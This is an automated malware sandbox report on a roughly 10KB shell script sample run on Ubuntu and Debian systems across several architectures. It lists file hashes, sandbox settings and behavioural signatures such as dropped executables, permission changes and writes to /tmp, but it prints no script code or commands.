Analysis
-
max time kernel
81s -
max time network
84s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/10/2024, 01:34
Static task
static1
Behavioral task
behavioral1
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
-
Size
10KB
-
MD5
87159c208c4802b4a091c9afdab0a149
-
SHA1
4a431fedf0d52d9e6f66216d506e9c9c8b992f5c
-
SHA256
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089
-
SHA512
753de5440287c2ca57ed60036c9e630dd86b64c1175e48f95bd64e1d646ed12a86163212d2be91e9c5dd44a440717dd41c11a8fdfd89991d74ba2ff9ac324cf0
-
SSDEEP
192:ETiaS/TRw4sFgAuWD+y+TiaS/TK4sFgAyG:ETiaS/TR9WDv+TiaS/TU
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
File opened for reading: /proc/sys/crypto/fips_enabled (Process: curl) -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97